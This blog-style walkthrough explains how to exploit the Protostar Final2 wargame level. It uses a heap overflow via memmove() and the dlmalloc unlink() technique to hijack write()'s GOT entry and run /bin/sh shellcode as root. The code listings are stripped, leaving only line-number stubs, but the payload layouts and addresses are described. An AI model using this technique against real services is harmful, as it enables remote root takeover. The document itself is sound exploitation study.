This is an explanation of Protostar level Final2. I wrote a solution in April without an explanation. I read it last night and had to spend half a day to understand it again. So next time I’ll write the explanation while it’s still fresh in my head.
The level’s description is
Remote heap level :)
Core files will be in /tmp.
This level is at /opt/protostar/bin/final2
This is the source code.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 |
|
Overview of source code
The first line of the description coupled with the fact the code listens on port 2993 means we’ll
have to send a TCP packet that exploits a heap related vulnerability. main()
is pretty simple. It
runs the final2 binary in the background as root and processes requests with get_requests()
.
get_requests()
declares an array of 256 char pointers and reads input strings into it. If any
request size isn’t REQSZ
or 128 bytes, the function breaks out of the while(1)
loop. Any request
payload that doesn’t start with FSRD
also breaks out of the loop. The check_path()
function is
then called and dll
is incremented. A for-loop writes “Process OK” to stdout and frees each string
buffer starting with the oldest.
check_path()
stores a pointer to buf
’s right-most /
in p
. l
is the length of the string
starting from p
. If p
is greater than 0, start
points to the part of buf
that has "ROOT"
.
If "ROOT"
is a substring in buf
, the while loop decrements start
until it finds a /
. Then
memmove()
moves l
bytes of the string starting at p
to start
.
A TCP packet with the string FSRD/ROOT/AAAA
will cause p
to point to the second /
. So p
as a
string is /AAAA
. l
is 5. start
initially points to the R
in ROOT
and later is decremented
to point to the first /
. memmove()
changes the string to FSRD/AAAA/AAAA
.
Notice that start--
doesn’t check the bounds of the string passed in by buf
. It will keep
scanning leftward until it finds some /
. So memmove()
can write to memory outside of the current
string.
General Exploit Strategy
We know we’ll need to exploit the free()
call which in this series of exercises uses the
vulnerable dlmalloc unlink()
macro. In a previous post, I showed how this exploit
manipulates heap memory to redirect code execution. We’ll need to inject shellcode via the request
payloads. Our request payloads also need to corrupt heap memory in a way that will trick dlmalloc
into redirecting code to the shellcode.
Exploiting memmove()
Let’s craft a first payload that will allow the second payload to overwrite heap memory before the
start of the second string. FSRDAAAA...AAAA/AAAA
should work. The second payload can be
FSRDROOTAAA...AAAA/BBBB
. After the second call to check_path()
, the heap memory of the first
string should be FSRDAAAA...AAAA/BBBB
. Let’s confirm this with a Python script and gdb
. We’ll
set a breakpoint right after the call to check_path()
and send these two strings.
We save the following contents to a file named test.py
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|
I’m running the Protostar VM on Virtualbox on a Macbook. Set the network settings for the VM to
Host-only Adapter. Once the VM starts, use the Virtualbox “Show” button to get a terminal to the VM.
Login as user
with password user
. Run ip addr show
to find the VM’s local IP address. Mine is
192.168.99.107
. I then close the Virtualbox terminal because I like to use iTerm. I SSH with iTerm
into the VM as root with password godmode
. We need to be root in order to attach gdb to a running
process.
1
|
|
You can see final2 is already running. We get the PID.
1 2 |
|
Now attach gdb to it. Since the program forks a new child process to handle requests, we set follow-fork-mode child
to make gdb follow the child process instead of the parent. set detach-on-fork off
makes gdb hold control of both parent and child (I’m not sure if this is necessary). The other two gdb settings are my personal preferences.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
|
Disassemble get_requests()
to find where check_path()
returns.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Now run our Python script in another terminal to send the strings.
1
|
|
Our gdb terminal will show the following.
1 2 3 4 5 6 7 8 |
|
Print buf
to show the address it points to. Then examine the first 40 DWORDs in hexadecimal
starting at address 0x804e000
(0x804e008 - 0x8
so we can see the first heap chunk’s metadata in
the previous 8 bytes). We can see its FSRD
(0x44525346
) followed by lots of A
s (0x41
s) and
ends in /AAAA
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
We continue and examine the memory of the first chunk again. We expect the memory at address
0x804e084
to be BBBB
or 0x42424242
which it is.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Exploiting free()
With the ability to overwrite bytes following a strategically placed /
character in the previous
heap chunk, we can perform a classic heap overflow exploit using the unlink()
technique. We can’t
overwrite the first chunk’s heap metadata because there’s no way to insert a /
before it. So we
target the second chunk’s heap metadata. I’m now going to rehash some of the dlmalloc algorithm
explained in my previous post because it can be a little confusing.
When the first chunk is freed, unlink()
will run on the second chunk if the second chunk has
already been freed. dlmalloc determines if the second chunk is freed by checking the third chunk’s
PREV_INUSE
bit which is the lowest bit of the second byte of the chunk. In order to find the start
of the third chunk, dlmalloc adds the value of the chunk’s second DWORD bitmasked with 0x1 (i.e.
ignoring the lowest bit) to the chunk’s starting address. So in the above memory dump, the
start of the second chunk is 0x00000089 &0x1 + 0x804e000 = 0x804e088
. Likewise, the start of the
third chunk is 0x00000089 &0x1 + 0x804e088 = 0x804e110
. So we have to figure out a way to write
arbitrary bytes to the third chunk.
But we’re already writing arbitrary bytes to the second chunk’s metadata. Is there way to make
dlmalloc think the third chunk starts somewhere in memory where we’re already writing bytes for the
second chunk? Nothing in dlmalloc checks the third chunk is actually right after the second.
dlmalloc just blindly performs an addition on two numbers. One of these numbers is the second
chunk’s size which we can set via the memmove()
bug. Let’s make dlmalloc think the third chunk is
actually four bytes before the start of the second chunk. The second chunk is at 0x804e088
so the
“virtual” third chunk will be at 0x804e084
. What number added to 0x804e088
equals 0x804e084
?
-4. [Integer overflow] means adding 0xfffffffc
is the same as adding -4 (0x804e088 + 0xfffffffc =
0x804e084
). So the second chunk’s second DWORD representing its size must be 0xfffffffc
, and the
PREV_INUSE
bit of the third chunk must be 0. 0xfffffffc 0xfffffffc
will work.
Once we fool dlmalloc into thinking the second chunk is already freed, dlmalloc will unlink()
it.
So we need to craft values for the second chunk’s forwards and backwards pointers such that
unlink()
will redirect code execution to another region of memory where we can insert shellcode.
In the Heap3 level we overwrote the address of a function in the procedure linkage table (PLT) with
the address of shellcode. We can do the same here. Since we send two packets, dll
will be 2. The
for-loop will call write()
twice. The first free()
will overwrite write()
’s address in the
PLT. Let’s find the PLT address containing the address of write()
. We disassemble get_requests
,
examine the address 0x8048dfc
as an instruction to get the address in the global offset table
(GOT) that points to the dynamically linked library containing the actual write()0
function. We
want to overwrite the contents of 0x804d41c
with the address of our shellcode. Since unlink()
adds 12 to the forwards pointer, we need to make the forward pointer 0x804d41c - 12
.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Crafting Malicious Packets
Where should we put our shellcode? We can include it in our first request. The first two DWORDs will
be clobbered by dlmalloc when it sets the first chunk’s forwards and backwards pointers. The first
word needs to be used for FSRD
anyways. So let’s put shellcode at 0x804e010
. This address will
be our backwards pointer.
To summarize, this is how the packets should look so far.
The first payload must start with FSRD
. Then we need four bytes of filler bytes AAAA
followed by
shellcode (TBD). The last byte must be /
for memmove()
. The payload must be 128 bytes. The
spaces in the payload visualization below are just for readability. They shouldn’t be in the actual
payload.
1
|
|
The second payload must start with FSRDROOT
. Then have 0xfffffffc 0xfffffffc
. Then the forward
pointer 0x804d41c - 12
and backward pointer 0x804e010
. The whole payload must again be 128
bytes. We can just fill with A
s.
1
|
|
Before we craft shellcode, let’s confirm the exploit will redirect code execution to the proposed
shellcode address. Instead of using actual shellcode, we’ll use four bytes of 0xcc
which is a
one-byte x86 instruction called INT3
that causes the processor to halt the process for any
attached debuggers. If we hit this opcode, our attached gdb debugger receive the SIGTRAP
signal.
Let’s test with the below Python script.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
Attach gdb to the final2
process again.
1 2 3 4 5 6 7 8 9 10 11 |
|
Set a breakpoint at the call to write()
.
1 2 3 4 |
|
Run the Python script in another terminal. Hit enter to send a third packet that’s less than 128
bytes to break out of the while(1)
loop.
1 2 3 |
|
The gdb session should hit the breakpoint at write()
.
1 2 3 4 5 6 7 8 |
|
Examine the first 80 DWORDs. Continue and examine again.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
|
Memory at 0x804e008
and 0x804e00c
have been changed (to addresses before the heap. I guess
because it’s some special value for the first chunk). Our INT3 instruction is at 0x804e010
. Let’s
look at the GOT entry for write()
.
1 2 3 4 5 |
|
Its value is the location of our INT3. This means the next call to write()
will redirect code
execution to our INT3 which should cause gdb to break again.
1 2 3 4 5 |
|
It worked!
Crafting the Shellcode
So now all we have to is insert some real shellcode that’ll own the system. Since final2 is running
as root
, let’s make the process start a shell. This will allow us send arbitrary commands over TCP
that get executed as root, i.e. remote code execution. Shellstorm has a great library of
shellcodes. Let’s use “Linux/x86 - execve(/bin/sh) - 28 bytes”. But we have a
problem. unlink()
overwrites the memory at 0x804e018
(it’ll always overwrite four bytes of
memory eight bytes ahead of whatever address we pick), and no useful shellcode is short enough to
fit into eight bytes. What can we do?
If the shellcode could only jump past 0x804e018
to 0x804e01c
where we have a huge piece of
contiguous memory. Luckily the jmp
instruction (\xeb
) does exactly this. Its argument is how many
bytes to jump over. So our shellcode can start with 0xeb 0x0a
which moves the instruction pointer
10 bytes forward. We fill in the middle 10 bytes with nop
s (0x90
). Our final script will
be this.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
|
1 2 3 4 5 |
|